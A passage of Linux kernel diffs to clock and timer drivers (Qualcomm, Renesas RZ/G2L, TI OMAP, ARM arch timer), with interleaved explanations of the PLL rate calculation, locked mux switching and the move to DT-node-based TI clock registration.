+ 	[USB30_MOCK_UTMI_CLK_SRC] = &usb30_mock_utmi_clk_src.clkr,
+ 	[USB3_PHY_AUX_CLK_SRC] = &usb3_phy_aux_clk_src.clkr,
+diff --git a/drivers/clk/qcom/gcc-sm8150.c b/drivers/clk/qcom/gcc-sm8150.c
+index 09cf827addabe..4501c15c4a417 100644
+--- a/drivers/clk/qcom/gcc-sm8150.c
++++ b/drivers/clk/qcom/gcc-sm8150.c
+@@ -792,7 +792,7 @@ static struct clk_rcg2 gcc_sdcc2_apps_clk_src = {
+ 		.name = "gcc_sdcc2_apps_clk_src",
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+-		.flags = CLK_SET_RATE_PARENT,
++		.flags = CLK_OPS_PARENT_ENABLE,
+ 		.ops = &clk_rcg2_floor_ops,
+ 	},
+ };
+diff --git a/drivers/clk/qcom/mmcc-msm8998.c b/drivers/clk/qcom/mmcc-msm8998.c
+index c421b12916516..e5a72c2f080f8 100644
+--- a/drivers/clk/qcom/mmcc-msm8998.c
++++ b/drivers/clk/qcom/mmcc-msm8998.c
+@@ -2478,6 +2478,7 @@ static struct clk_branch fd_ahb_clk = {
+ 
+ static struct clk_branch mnoc_ahb_clk = {
+ 	.halt_reg = 0x5024,
++	.halt_check = BRANCH_HALT_SKIP,
+ 	.clkr = {
+ 		.enable_reg = 0x5024,
+ 		.enable_mask = BIT(0),
+@@ -2493,6 +2494,7 @@ static struct clk_branch mnoc_ahb_clk = {
+ 
+ static struct clk_branch bimc_smmu_ahb_clk = {
+ 	.halt_reg = 0xe004,
++	.halt_check = BRANCH_HALT_SKIP,
+ 	.hwcg_reg = 0xe004,
+ 	.hwcg_bit = 1,
+ 	.clkr = {
+@@ -2510,6 +2512,7 @@ static struct clk_branch bimc_smmu_ahb_clk = {
+ 
+ static struct clk_branch bimc_smmu_axi_clk = {
+ 	.halt_reg = 0xe008,
++	.halt_check = BRANCH_HALT_SKIP,
+ 	.hwcg_reg = 0xe008,
+ 	.hwcg_bit = 1,
+ 	.clkr = {
+@@ -2650,11 +2653,13 @@ static struct gdsc camss_cpp_gdsc = {
+ static struct gdsc bimc_smmu_gdsc = {
+ 	.gdscr = 0xe020,
+ 	.gds_hw_ctrl = 0xe024,
++	.cxcs = (unsigned int []){ 0xe008 },
++	.cxc_count = 1,
+ 	.pd = {
+ 		.name = "bimc_smmu",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+-	.flags = HW_CTRL | ALWAYS_ON,
++	.flags = VOTABLE,
+ };
+ 
+ static struct clk_regmap *mmcc_msm8998_clocks[] = {
+diff --git a/drivers/clk/renesas/rcar-cpg-lib.c b/drivers/clk/renesas/rcar-cpg-lib.c
+index e2e0447de1901..5a15f8788b922 100644
+--- a/drivers/clk/renesas/rcar-cpg-lib.c
++++ b/drivers/clk/renesas/rcar-cpg-lib.c
+@@ -70,8 +70,21 @@ void cpg_simple_notifier_register(struct raw_notifier_head *notifiers,
+ #define STPnHCK	BIT(9 - SDnSRCFC_SHIFT)
+ 
+ static const struct clk_div_table cpg_sdh_div_table[] = {
++	/*
++	 * These values are recommended by the datasheet.  Because they come
++	 * first, Linux will only use these.
++	 */
+ 	{ 0, 1 }, { 1, 2 }, { STPnHCK | 2, 4 }, { STPnHCK | 3, 8 },
+-	{ STPnHCK | 4, 16 }, { 0, 0 },
++	{ STPnHCK | 4, 16 },
++	/*
++	 * These values are not recommended because STPnHCK is wrong.  But they
++	 * have been seen because of broken firmware.  So, we support reading
++	 * them but Linux will sanitize them when initializing through
++	 * recalc_rate.
++	 */
++	{ STPnHCK | 0, 1 }, { STPnHCK | 1, 2 },  { 2, 4 }, { 3, 8 }, { 4, 16 },
++	/* Sentinel */
++	{ 0, 0 }
+ };
+ 
+ struct clk * __init cpg_sdh_clk_register(const char *name,
+diff --git a/drivers/clk/renesas/rzg2l-cpg.c b/drivers/clk/renesas/rzg2l-cpg.c
+index 2c877576c5729..84767cfc1e739 100644
+--- a/drivers/clk/renesas/rzg2l-cpg.c
++++ b/drivers/clk/renesas/rzg2l-cpg.c
+@@ -11,6 +11,7 @@
+  * Copyright (C) 2015 Renesas Electronics Corp.
+  */
+ 
++#include <linux/bitfield.h>
+ #include <linux/clk.h>
+ #include <linux/clk-provider.h>
+ #include <linux/clk/renesas.h>
+@@ -39,14 +40,13 @@
+ #define WARN_DEBUG(x)	do { } while (0)
+ #endif
+ 
+-#define DIV_RSMASK(v, s, m)	((v >> s) & m)
+ #define GET_SHIFT(val)		((val >> 12) & 0xff)
+ #define GET_WIDTH(val)		((val >> 8) & 0xf)
+ 
+-#define KDIV(val)		DIV_RSMASK(val, 16, 0xffff)
+-#define MDIV(val)		DIV_RSMASK(val, 6, 0x3ff)
+-#define PDIV(val)		DIV_RSMASK(val, 0, 0x3f)
+-#define SDIV(val)		DIV_RSMASK(val, 0, 0x7)
++#define KDIV(val)		((s16)FIELD_GET(GENMASK(31, 16), val))
++#define MDIV(val)		FIELD_GET(GENMASK(15, 6), val)
++#define PDIV(val)		FIELD_GET(GENMASK(5, 0), val)
++#define SDIV(val)		FIELD_GET(GENMASK(2, 0), val)
+ 
+ #define CLK_ON_R(reg)		(reg)
+ #define CLK_MON_R(reg)		(0x180 + (reg))
+@@ -192,7 +192,9 @@ static int rzg2l_cpg_sd_clk_mux_set_parent(struct clk_hw *hw, u8 index)
+ 	u32 off = GET_REG_OFFSET(hwdata->conf);
+ 	u32 shift = GET_SHIFT(hwdata->conf);
+ 	const u32 clk_src_266 = 2;
+-	u32 bitmask;
++	u32 msk, val, bitmask;
++	unsigned long flags;
++	int ret;
+ 
+ 	/*
+ 	 * As per the HW manual, we should not directly switch from 533 MHz to
+@@ -206,26 +208,30 @@ static int rzg2l_cpg_sd_clk_mux_set_parent(struct clk_hw *hw, u8 index)
+ 	 * the index to value mapping is done by adding 1 to the index.
+ 	 */
+ 	bitmask = (GENMASK(GET_WIDTH(hwdata->conf) - 1, 0) << shift) << 16;
++	msk = off ? CPG_CLKSTATUS_SELSDHI1_STS : CPG_CLKSTATUS_SELSDHI0_STS;
++	spin_lock_irqsave(&priv->rmw_lock, flags);
+ 	if (index != clk_src_266) {
+-		u32 msk, val;
+-		int ret;
+-
+ 		writel(bitmask | ((clk_src_266 + 1) << shift), priv->base + off);
+ 
+-		msk = off ? CPG_CLKSTATUS_SELSDHI1_STS : CPG_CLKSTATUS_SELSDHI0_STS;
+-
+-		ret = readl_poll_timeout(priv->base + CPG_CLKSTATUS, val,
+-					 !(val & msk), 100,
+-					 CPG_SDHI_CLK_SWITCH_STATUS_TIMEOUT_US);
+-		if (ret) {
+-			dev_err(priv->dev, "failed to switch clk source\n");
+-			return ret;
+-		}
++		ret = readl_poll_timeout_atomic(priv->base + CPG_CLKSTATUS, val,
++						!(val & msk), 10,
++						CPG_SDHI_CLK_SWITCH_STATUS_TIMEOUT_US);
++		if (ret)
++			goto unlock;
+ 	}
+ 
+ 	writel(bitmask | ((index + 1) << shift), priv->base + off);
+ 
+-	return 0;
++	ret = readl_poll_timeout_atomic(priv->base + CPG_CLKSTATUS, val,
++					!(val & msk), 10,
++					CPG_SDHI_CLK_SWITCH_STATUS_TIMEOUT_US);
++unlock:
++	spin_unlock_irqrestore(&priv->rmw_lock, flags);
++
++	if (ret)
++		dev_err(priv->dev, "failed to switch clk source\n");
++
++	return ret;
+ }
+ 
+ static u8 rzg2l_cpg_sd_clk_mux_get_parent(struct clk_hw *hw)
+@@ -236,14 +242,8 @@ static u8 rzg2l_cpg_sd_clk_mux_get_parent(struct clk_hw *hw)
+ 
+ 	val >>= GET_SHIFT(hwdata->conf);
+ 	val &= GENMASK(GET_WIDTH(hwdata->conf) - 1, 0);
+-	if (val) {
+-		val--;
+-	} else {
+-		/* Prohibited clk source, change it to 533 MHz(reset value) */
+-		rzg2l_cpg_sd_clk_mux_set_parent(hw, 0);
+-	}
+ 
+-	return val;
++	return val ? val - 1 : 0;
+ }
+ 
+ static const struct clk_ops rzg2l_cpg_sd_clk_mux_ops = {
+@@ -699,18 +699,18 @@ static unsigned long rzg2l_cpg_pll_clk_recalc_rate(struct clk_hw *hw,
+ 	struct pll_clk *pll_clk = to_pll(hw);
+ 	struct rzg2l_cpg_priv *priv = pll_clk->priv;
+ 	unsigned int val1, val2;
+-	unsigned int mult = 1;
+-	unsigned int div = 1;
++	u64 rate;
+ 
+ 	if (pll_clk->type != CLK_TYPE_SAM_PLL)
+ 		return parent_rate;
+ 
+ 	val1 = readl(priv->base + GET_REG_SAMPLL_CLK1(pll_clk->conf));
+ 	val2 = readl(priv->base + GET_REG_SAMPLL_CLK2(pll_clk->conf));
+-	mult = MDIV(val1) + KDIV(val1) / 65536;
+-	div = PDIV(val1) << SDIV(val2);
+ 
+-	return DIV_ROUND_CLOSEST_ULL((u64)parent_rate * mult, div);
++	rate = mul_u64_u32_shr(parent_rate, (MDIV(val1) << 16) + KDIV(val1),
++			       16 + SDIV(val2));
++
++	return DIV_ROUND_CLOSEST_ULL(rate, PDIV(val1));
+ }
+ 
+ static const struct clk_ops rzg2l_cpg_pll_ops = {
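
The old rzg2l recalc computed "mult = MDIV(val1) + KDIV(val1) / 65536" in integer math, which discards the fractional K contribution entirely (K / 65536 truncates to zero). Reading the new code, the SAM PLL rate is parent * (M + K / 2^16) / (P * 2^S), and the rewrite keeps K by folding the 2^16 scaling and the 2^S post-divider into one 64-bit multiply-shift; note KDIV() now casts through s16 because K is a signed two's-complement field. Spelled out:

	/*
	 * mul_u64_u32_shr(a, mul, shift) == (a * mul) >> shift with a
	 * wide intermediate, so with mul = (M << 16) + K and
	 * shift = 16 + S:
	 *
	 *   parent * ((M << 16) + K) >> (16 + S)
	 *     == parent * (M + K / 65536) / (1 << S)
	 *
	 * leaving only the P divider, applied with rounding.
	 */
	rate = mul_u64_u32_shr(parent_rate, (MDIV(val1) << 16) + KDIV(val1),
			       16 + SDIV(val2));
	return DIV_ROUND_CLOSEST_ULL(rate, PDIV(val1));

The mux hunk in the same file moves the status polling under a spinlock and switches to readl_poll_timeout_atomic(), which is consistent with the header's timeout dropping from 20000 to 200 microseconds: atomic polling must not spin for tens of milliseconds.
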
+diff --git a/drivers/clk/renesas/rzg2l-cpg.h b/drivers/clk/renesas/rzg2l-cpg.h
+index b33a3e79161b6..aefa53a900597 100644
+--- a/drivers/clk/renesas/rzg2l-cpg.h
++++ b/drivers/clk/renesas/rzg2l-cpg.h
+@@ -43,7 +43,7 @@
+ #define CPG_CLKSTATUS_SELSDHI0_STS	BIT(28)
+ #define CPG_CLKSTATUS_SELSDHI1_STS	BIT(29)
+ 
+-#define CPG_SDHI_CLK_SWITCH_STATUS_TIMEOUT_US	20000
++#define CPG_SDHI_CLK_SWITCH_STATUS_TIMEOUT_US	200
+ 
+ /* n = 0/1/2 for PLL1/4/6 */
+ #define CPG_SAMPLL_CLK1(n)	(0x04 + (16 * n))
+diff --git a/drivers/clk/ti/apll.c b/drivers/clk/ti/apll.c
+index dd0709c9c2498..93183287c58db 100644
+--- a/drivers/clk/ti/apll.c
++++ b/drivers/clk/ti/apll.c
+@@ -160,7 +160,7 @@ static void __init omap_clk_register_apll(void *user,
+ 	ad->clk_bypass = __clk_get_hw(clk);
+ 
+ 	name = ti_dt_clk_name(node);
+-	clk = ti_clk_register_omap_hw(NULL, &clk_hw->hw, name);
++	clk = of_ti_clk_register_omap_hw(node, &clk_hw->hw, name);
+ 	if (!IS_ERR(clk)) {
+ 		of_clk_add_provider(node, of_clk_src_simple_get, clk);
+ 		kfree(init->parent_names);
+@@ -400,7 +400,7 @@ static void __init of_omap2_apll_setup(struct device_node *node)
+ 		goto cleanup;
+ 
+ 	name = ti_dt_clk_name(node);
+-	clk = ti_clk_register_omap_hw(NULL, &clk_hw->hw, name);
++	clk = of_ti_clk_register_omap_hw(node, &clk_hw->hw, name);
+ 	if (!IS_ERR(clk)) {
+ 		of_clk_add_provider(node, of_clk_src_simple_get, clk);
+ 		kfree(init);
+diff --git a/drivers/clk/ti/clk-dra7-atl.c b/drivers/clk/ti/clk-dra7-atl.c
+index ff4d6a9516813..1c576599f6dbd 100644
+--- a/drivers/clk/ti/clk-dra7-atl.c
++++ b/drivers/clk/ti/clk-dra7-atl.c
+@@ -197,7 +197,7 @@ static void __init of_dra7_atl_clock_setup(struct device_node *node)
+ 
+ 	init.parent_names = parent_names;
+ 
+-	clk = ti_clk_register(NULL, &clk_hw->hw, name);
++	clk = of_ti_clk_register(node, &clk_hw->hw, name);
+ 
+ 	if (!IS_ERR(clk)) {
+ 		of_clk_add_provider(node, of_clk_src_simple_get, clk);
+diff --git a/drivers/clk/ti/clk.c b/drivers/clk/ti/clk.c
+index 1dc2f15fb75b2..269355010cdce 100644
+--- a/drivers/clk/ti/clk.c
++++ b/drivers/clk/ti/clk.c
+@@ -475,7 +475,7 @@ void __init ti_clk_add_aliases(void)
+ 		clkspec.np = np;
+ 		clk = of_clk_get_from_provider(&clkspec);
+ 
+-		ti_clk_add_alias(NULL, clk, ti_dt_clk_name(np));
++		ti_clk_add_alias(clk, ti_dt_clk_name(np));
+ 	}
+ }
+ 
+@@ -528,7 +528,6 @@ void omap2_clk_enable_init_clocks(const char **clk_names, u8 num_clocks)
+ 
+ /**
+  * ti_clk_add_alias - add a clock alias for a TI clock
+- * @dev: device alias for this clock
+  * @clk: clock handle to create alias for
+  * @con: connection ID for this clock
+  *
+@@ -536,7 +535,7 @@ void omap2_clk_enable_init_clocks(const char **clk_names, u8 num_clocks)
+  * and assigns the data to it. Returns 0 if successful, negative error
+  * value otherwise.
+  */
+-int ti_clk_add_alias(struct device *dev, struct clk *clk, const char *con)
++int ti_clk_add_alias(struct clk *clk, const char *con)
+ {
+ 	struct clk_lookup *cl;
+ 
+@@ -550,8 +549,6 @@ int ti_clk_add_alias(struct device *dev, struct clk *clk, const char *con)
+ 	if (!cl)
+ 		return -ENOMEM;
+ 
+-	if (dev)
+-		cl->dev_id = dev_name(dev);
+ 	cl->con_id = con;
+ 	cl->clk = clk;
+ 
+@@ -561,8 +558,8 @@ int ti_clk_add_alias(struct device *dev, struct clk *clk, const char *con)
+ }
+ 
+ /**
+- * ti_clk_register - register a TI clock to the common clock framework
+- * @dev: device for this clock
++ * of_ti_clk_register - register a TI clock to the common clock framework
++ * @node: device node for this clock
+  * @hw: hardware clock handle
+  * @con: connection ID for this clock
+  *
+@@ -570,17 +567,18 @@ int ti_clk_add_alias(struct device *dev, struct clk *clk, const char *con)
+  * alias for it. Returns a handle to the registered clock if successful,
+  * ERR_PTR value in failure.
+  */
+-struct clk *ti_clk_register(struct device *dev, struct clk_hw *hw,
+-			    const char *con)
++struct clk *of_ti_clk_register(struct device_node *node, struct clk_hw *hw,
++			       const char *con)
+ {
+ 	struct clk *clk;
+ 	int ret;
+ 
+-	clk = clk_register(dev, hw);
+-	if (IS_ERR(clk))
+-		return clk;
++	ret = of_clk_hw_register(node, hw);
++	if (ret)
++		return ERR_PTR(ret);
+ 
+-	ret = ti_clk_add_alias(dev, clk, con);
++	clk = hw->clk;
++	ret = ti_clk_add_alias(clk, con);
+ 	if (ret) {
+ 		clk_unregister(clk);
+ 		return ERR_PTR(ret);
+@@ -590,8 +588,8 @@ struct clk *ti_clk_register(struct device *dev, struct clk_hw *hw,
+ }
+ 
+ /**
+- * ti_clk_register_omap_hw - register a clk_hw_omap to the clock framework
+- * @dev: device for this clock
++ * of_ti_clk_register_omap_hw - register a clk_hw_omap to the clock framework
++ * @node: device node for this clock
+  * @hw: hardware clock handle
+  * @con: connection ID for this clock
+  *
+@@ -600,13 +598,13 @@ struct clk *ti_clk_register(struct device *dev, struct clk_hw *hw,
+  * Returns a handle to the registered clock if successful, ERR_PTR value
+  * in failure.
+  */
+-struct clk *ti_clk_register_omap_hw(struct device *dev, struct clk_hw *hw,
+-				    const char *con)
++struct clk *of_ti_clk_register_omap_hw(struct device_node *node,
++				       struct clk_hw *hw, const char *con)
+ {
+ 	struct clk *clk;
+ 	struct clk_hw_omap *oclk;
+ 
+-	clk = ti_clk_register(dev, hw, con);
++	clk = of_ti_clk_register(node, hw, con);
+ 	if (IS_ERR(clk))
+ 		return clk;
+ 
+diff --git a/drivers/clk/ti/clkctrl.c b/drivers/clk/ti/clkctrl.c
+index 57611bfb299c1..87e5624789ef6 100644
+--- a/drivers/clk/ti/clkctrl.c
++++ b/drivers/clk/ti/clkctrl.c
+@@ -308,7 +308,7 @@ _ti_clkctrl_clk_register(struct omap_clkctrl_provider *provider,
+ 	init.ops = ops;
+ 	init.flags = 0;
+ 
+-	clk = ti_clk_register(NULL, clk_hw, init.name);
++	clk = of_ti_clk_register(node, clk_hw, init.name);
+ 	if (IS_ERR_OR_NULL(clk)) {
+ 		ret = -EINVAL;
+ 		goto cleanup;
+@@ -689,7 +689,7 @@ clkdm_found:
+ 		init.ops = &omap4_clkctrl_clk_ops;
+ 		hw->hw.init = &init;
+ 
+-		clk = ti_clk_register_omap_hw(NULL, &hw->hw, init.name);
++		clk = of_ti_clk_register_omap_hw(node, &hw->hw, init.name);
+ 		if (IS_ERR_OR_NULL(clk))
+ 			goto cleanup;
+ 
+diff --git a/drivers/clk/ti/clock.h b/drivers/clk/ti/clock.h
+index 37ab53339a9be..16a9f7c2280a5 100644
+--- a/drivers/clk/ti/clock.h
++++ b/drivers/clk/ti/clock.h
+@@ -199,12 +199,12 @@ extern const struct omap_clkctrl_data dm816_clkctrl_data[];
+ 
+ typedef void (*ti_of_clk_init_cb_t)(void *, struct device_node *);
+ 
+-struct clk *ti_clk_register(struct device *dev, struct clk_hw *hw,
+-			    const char *con);
+-struct clk *ti_clk_register_omap_hw(struct device *dev, struct clk_hw *hw,
+-				    const char *con);
++struct clk *of_ti_clk_register(struct device_node *node, struct clk_hw *hw,
++			       const char *con);
++struct clk *of_ti_clk_register_omap_hw(struct device_node *node,
++				       struct clk_hw *hw, const char *con);
+ const char *ti_dt_clk_name(struct device_node *np);
+-int ti_clk_add_alias(struct device *dev, struct clk *clk, const char *con);
++int ti_clk_add_alias(struct clk *clk, const char *con);
+ void ti_clk_add_aliases(void);
+ 
+ void ti_clk_latch(struct clk_omap_reg *reg, s8 shift);
+diff --git a/drivers/clk/ti/composite.c b/drivers/clk/ti/composite.c
+index 77b771dd050a9..b85382c370f7e 100644
+--- a/drivers/clk/ti/composite.c
++++ b/drivers/clk/ti/composite.c
+@@ -176,7 +176,7 @@ static void __init _register_composite(void *user,
+ 				     &ti_composite_gate_ops, 0);
+ 
+ 	if (!IS_ERR(clk)) {
+-		ret = ti_clk_add_alias(NULL, clk, name);
++		ret = ti_clk_add_alias(clk, name);
+ 		if (ret) {
+ 			clk_unregister(clk);
+ 			goto cleanup;
+diff --git a/drivers/clk/ti/divider.c b/drivers/clk/ti/divider.c
+index 488d3da60c317..5d5bb123ba949 100644
+--- a/drivers/clk/ti/divider.c
++++ b/drivers/clk/ti/divider.c
+@@ -309,7 +309,6 @@ static struct clk *_register_divider(struct device_node *node,
+ 				     u32 flags,
+ 				     struct clk_omap_divider *div)
+ {
+-	struct clk *clk;
+ 	struct clk_init_data init;
+ 	const char *parent_name;
+ 	const char *name;
+@@ -326,12 +325,7 @@ static struct clk *_register_divider(struct device_node *node,
+ 	div->hw.init = &init;
+ 
+ 	/* register the clock */
+-	clk = ti_clk_register(NULL, &div->hw, name);
+-
+-	if (IS_ERR(clk))
+-		kfree(div);
+-
+-	return clk;
++	return of_ti_clk_register(node, &div->hw, name);
+ }
+ 
+ int ti_clk_parse_divider_data(int *div_table, int num_dividers, int max_div,
+diff --git a/drivers/clk/ti/dpll.c b/drivers/clk/ti/dpll.c
+index 8ed43bc6b7cc8..403ec81f561b6 100644
+--- a/drivers/clk/ti/dpll.c
++++ b/drivers/clk/ti/dpll.c
+@@ -187,7 +187,7 @@ static void __init _register_dpll(void *user,
+ 
+ 	/* register the clock */
+ 	name = ti_dt_clk_name(node);
+-	clk = ti_clk_register_omap_hw(NULL, &clk_hw->hw, name);
++	clk = of_ti_clk_register_omap_hw(node, &clk_hw->hw, name);
+ 
+ 	if (!IS_ERR(clk)) {
+ 		of_clk_add_provider(node, of_clk_src_simple_get, clk);
+@@ -259,7 +259,7 @@ static void _register_dpll_x2(struct device_node *node,
+ #endif
+ 
+ 	/* register the clock */
+-	clk = ti_clk_register_omap_hw(NULL, &clk_hw->hw, name);
++	clk = of_ti_clk_register_omap_hw(node, &clk_hw->hw, name);
+ 
+ 	if (IS_ERR(clk))
+ 		kfree(clk_hw);
+diff --git a/drivers/clk/ti/fixed-factor.c b/drivers/clk/ti/fixed-factor.c
+index c80cee0f5d3d7..c102c53201686 100644
+--- a/drivers/clk/ti/fixed-factor.c
++++ b/drivers/clk/ti/fixed-factor.c
+@@ -54,7 +54,7 @@ static void __init of_ti_fixed_factor_clk_setup(struct device_node *node)
+ 	if (!IS_ERR(clk)) {
+ 		of_clk_add_provider(node, of_clk_src_simple_get, clk);
+ 		of_ti_clk_autoidle_setup(node);
+-		ti_clk_add_alias(NULL, clk, clk_name);
++		ti_clk_add_alias(clk, clk_name);
+ 	}
+ }
+ CLK_OF_DECLARE(ti_fixed_factor_clk, "ti,fixed-factor-clock",
+diff --git a/drivers/clk/ti/gate.c b/drivers/clk/ti/gate.c
+index 307702921431d..8e477d50d0fdb 100644
+--- a/drivers/clk/ti/gate.c
++++ b/drivers/clk/ti/gate.c
+@@ -85,7 +85,7 @@ static int omap36xx_gate_clk_enable_with_hsdiv_restore(struct clk_hw *hw)
+ 	return ret;
+ }
+ 
+-static struct clk *_register_gate(struct device *dev, const char *name,
++static struct clk *_register_gate(struct device_node *node, const char *name,
+ 				  const char *parent_name, unsigned long flags,
+ 				  struct clk_omap_reg *reg, u8 bit_idx,
+ 				  u8 clk_gate_flags, const struct clk_ops *ops,
+@@ -115,7 +115,7 @@ static struct clk *_register_gate(struct device *dev, const char *name,
+ 
+ 	init.flags = flags;
+ 
+-	clk = ti_clk_register_omap_hw(NULL, &clk_hw->hw, name);
++	clk = of_ti_clk_register_omap_hw(node, &clk_hw->hw, name);
+ 
+ 	if (IS_ERR(clk))
+ 		kfree(clk_hw);
+@@ -158,7 +158,7 @@ static void __init _of_ti_gate_clk_setup(struct device_node *node,
+ 		clk_gate_flags |= INVERT_ENABLE;
+ 
+ 	name = ti_dt_clk_name(node);
+-	clk = _register_gate(NULL, name, parent_name, flags, &reg,
++	clk = _register_gate(node, name, parent_name, flags, &reg,
+ 			     enable_bit, clk_gate_flags, ops, hw_ops);
+ 
+ 	if (!IS_ERR(clk))
+diff --git a/drivers/clk/ti/interface.c b/drivers/clk/ti/interface.c
+index f47beeea211e8..172301c646f85 100644
+--- a/drivers/clk/ti/interface.c
++++ b/drivers/clk/ti/interface.c
+@@ -24,7 +24,8 @@ static const struct clk_ops ti_interface_clk_ops = {
+ 	.is_enabled	= &omap2_dflt_clk_is_enabled,
+ };
+ 
+-static struct clk *_register_interface(struct device *dev, const char *name,
++static struct clk *_register_interface(struct device_node *node,
++				       const char *name,
+ 				       const char *parent_name,
+ 				       struct clk_omap_reg *reg, u8 bit_idx,
+ 				       const struct clk_hw_omap_ops *ops)
+@@ -49,7 +50,7 @@ static struct clk *_register_interface(struct device *dev, const char *name,
+ 	init.num_parents = 1;
+ 	init.parent_names = &parent_name;
+ 
+-	clk = ti_clk_register_omap_hw(NULL, &clk_hw->hw, name);
++	clk = of_ti_clk_register_omap_hw(node, &clk_hw->hw, name);
+ 
+ 	if (IS_ERR(clk))
+ 		kfree(clk_hw);
+@@ -80,7 +81,7 @@ static void __init _of_ti_interface_clk_setup(struct device_node *node,
+ 	}
+ 
+ 	name = ti_dt_clk_name(node);
+-	clk = _register_interface(NULL, name, parent_name, &reg,
++	clk = _register_interface(node, name, parent_name, &reg,
+ 				  enable_bit, ops);
+ 
+ 	if (!IS_ERR(clk))
+diff --git a/drivers/clk/ti/mux.c b/drivers/clk/ti/mux.c
+index 46b45b3e8319a..1ebafa386be61 100644
+--- a/drivers/clk/ti/mux.c
++++ b/drivers/clk/ti/mux.c
+@@ -118,7 +118,7 @@ const struct clk_ops ti_clk_mux_ops = {
+ 	.restore_context = clk_mux_restore_context,
+ };
+ 
+-static struct clk *_register_mux(struct device *dev, const char *name,
++static struct clk *_register_mux(struct device_node *node, const char *name,
+ 				 const char * const *parent_names,
+ 				 u8 num_parents, unsigned long flags,
+ 				 struct clk_omap_reg *reg, u8 shift, u32 mask,
+@@ -148,7 +148,7 @@ static struct clk *_register_mux(struct device *dev, const char *name,
+ 	mux->table = table;
+ 	mux->hw.init = &init;
+ 
+-	clk = ti_clk_register(dev, &mux->hw, name);
++	clk = of_ti_clk_register(node, &mux->hw, name);
+ 
+ 	if (IS_ERR(clk))
+ 		kfree(mux);
+@@ -207,7 +207,7 @@ static void of_mux_clk_setup(struct device_node *node)
+ 	mask = (1 << fls(mask)) - 1;
+ 
+ 	name = ti_dt_clk_name(node);
+-	clk = _register_mux(NULL, name, parent_names, num_parents,
++	clk = _register_mux(node, name, parent_names, num_parents,
+ 			    flags, &reg, shift, mask, latch, clk_mux_flags,
+ 			    NULL);
+ 
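
The TI rename running through the hunks above is not cosmetic. ti_clk_register() went through clk_register(dev, hw) with dev == NULL, so the clock had no owner; of_ti_clk_register() uses of_clk_hw_register(node, hw), which ties the clock to its DT node and changes the return convention (an int errno plus hw->clk, rather than a struct clk pointer). Dropping the @dev parameter also lets ti_clk_add_alias() shed its dev_id handling, which was dead since every caller passed NULL. The new helper boils down to:

	ret = of_clk_hw_register(node, hw);	/* 0 or -errno */
	if (ret)
		return ERR_PTR(ret);

	ret = ti_clk_add_alias(hw->clk, con);	/* clkdev alias by con_id */
	if (ret) {
		clk_unregister(hw->clk);
		return ERR_PTR(ret);
	}
	return hw->clk;
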
+diff --git a/drivers/clocksource/arm_arch_timer.c b/drivers/clocksource/arm_arch_timer.c
+index 239c70ac120e8..fee1c4bf10214 100644
+--- a/drivers/clocksource/arm_arch_timer.c
++++ b/drivers/clocksource/arm_arch_timer.c
+@@ -817,8 +817,9 @@ static u64 __arch_timer_check_delta(void)
+ 		 * Note that TVAL is signed, thus has only 31 of its
+ 		 * 32 bits to express magnitude.
+ 		 */
+-		MIDR_ALL_VERSIONS(MIDR_CPU_MODEL(ARM_CPU_IMP_APM,
+-						 APM_CPU_PART_POTENZA)),
++		MIDR_REV_RANGE(MIDR_CPU_MODEL(ARM_CPU_IMP_APM,
++					      APM_CPU_PART_XGENE),
++			       APM_CPU_VAR_POTENZA, 0x0, 0xf),
+ 		{},
+ 	};
+ 
+diff --git a/drivers/clocksource/timer-ti-dm.c b/drivers/clocksource/timer-ti-dm.c
+index 00af1a8e34fbd..ec86aecb748f1 100644
+--- a/drivers/clocksource/timer-ti-dm.c
++++ b/drivers/clocksource/timer-ti-dm.c
+@@ -141,6 +141,8 @@ struct dmtimer {
+ 	struct platform_device *pdev;
+ 	struct list_head node;
+ 	struct notifier_block nb;
++	struct notifier_block fclk_nb;
++	unsigned long fclk_rate;
+ };
+ 
+ static u32 omap_reserved_systimers;
+@@ -254,8 +256,7 @@ static inline void __omap_dm_timer_enable_posted(struct dmtimer *timer)
+ 	timer->posted = OMAP_TIMER_POSTED;
+ }
+ 
+-static inline void __omap_dm_timer_stop(struct dmtimer *timer,
+-					unsigned long rate)
++static inline void __omap_dm_timer_stop(struct dmtimer *timer)
+ {
+ 	u32 l;
+ 
+@@ -270,7 +271,7 @@ static inline void __omap_dm_timer_stop(struct dmtimer *timer,
+ 		 * Wait for functional clock period x 3.5 to make sure that
+ 		 * timer is stopped
+ 		 */
+-		udelay(3500000 / rate + 1);
++		udelay(3500000 / timer->fclk_rate + 1);
+ #endif
+ 	}
+ 
+@@ -349,6 +350,21 @@ static int omap_timer_context_notifier(struct notifier_block *nb,
+ 	return NOTIFY_OK;
+ }
+ 
++static int omap_timer_fclk_notifier(struct notifier_block *nb,
++				    unsigned long event, void *data)
++{
++	struct clk_notifier_data *clk_data = data;
++	struct dmtimer *timer = container_of(nb, struct dmtimer, fclk_nb);
++
++	switch (event) {
++	case POST_RATE_CHANGE:
++		timer->fclk_rate = clk_data->new_rate;
++		return NOTIFY_OK;
++	default:
++		return NOTIFY_DONE;
++	}
++}
++
+ static int omap_dm_timer_reset(struct dmtimer *timer)
+ {
+ 	u32 l, timeout = 100000;
+@@ -742,7 +758,6 @@ static int omap_dm_timer_stop(struct omap_dm_timer *cookie)
+ {
+ 	struct dmtimer *timer;
+ 	struct device *dev;
+-	unsigned long rate = 0;
+ 
+ 	timer = to_dmtimer(cookie);
+ 	if (unlikely(!timer))
+@@ -750,10 +765,7 @@ static int omap_dm_timer_stop(struct omap_dm_timer *cookie)
+ 
+ 	dev = &timer->pdev->dev;
+ 
+-	if (!timer->omap1)
+-		rate = clk_get_rate(timer->fclk);
+-
+-	__omap_dm_timer_stop(timer, rate);
++	__omap_dm_timer_stop(timer);
+ 
+ 	pm_runtime_put_sync(dev);
+ 
+@@ -1112,6 +1124,14 @@ static int omap_dm_timer_probe(struct platform_device *pdev)
+ 		timer->fclk = devm_clk_get(dev, "fck");
+ 		if (IS_ERR(timer->fclk))
+ 			return PTR_ERR(timer->fclk);
++
++		timer->fclk_nb.notifier_call = omap_timer_fclk_notifier;
++		ret = devm_clk_notifier_register(dev, timer->fclk,
++						 &timer->fclk_nb);
++		if (ret)
++			return ret;
++
++		timer->fclk_rate = clk_get_rate(timer->fclk);
+ 	} else {
+ 		timer->fclk = ERR_PTR(-ENODEV);
+ 	}
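
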